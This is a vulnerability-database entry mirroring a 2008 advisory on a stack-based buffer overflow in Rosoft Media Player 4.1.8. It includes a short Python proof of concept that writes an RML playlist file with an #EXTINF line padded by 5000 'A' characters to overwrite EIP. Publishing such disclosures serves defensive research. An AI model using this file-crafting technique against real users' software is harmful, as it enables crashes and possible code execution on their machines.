Lucene search
K

rosoft-dos.txt

🗓️ 15 Mar 2008 00:00:00Reported by Wiktor SierocinskiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Flaw in Rosoft Media Player 4.1.8, allows Stack Based Buffer Overflow to overwrite EI

Code
`Description:  
This is nothing special - there is just flaw in Rosoft Media Player 4.1.8, similar to one discovered by Juan Pablo Lopez Yacubian.   
This one concerns RML file. This is Stack Based Buffer Overflow vulerability - we can ovewrite EIP. I hope that it was not reported before.   
  
Author: Wiktor Sierocinski  
POC:  
  
#!/usr/bin/python  
  
content = (  
"#EXTINF:Played=0\n" + "A" * 5000 + "\n"  
)  
  
fd = open("music.rml","w");  
fd.write(content)  
fd.close();  
  
print "RML FILE CREATED"  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation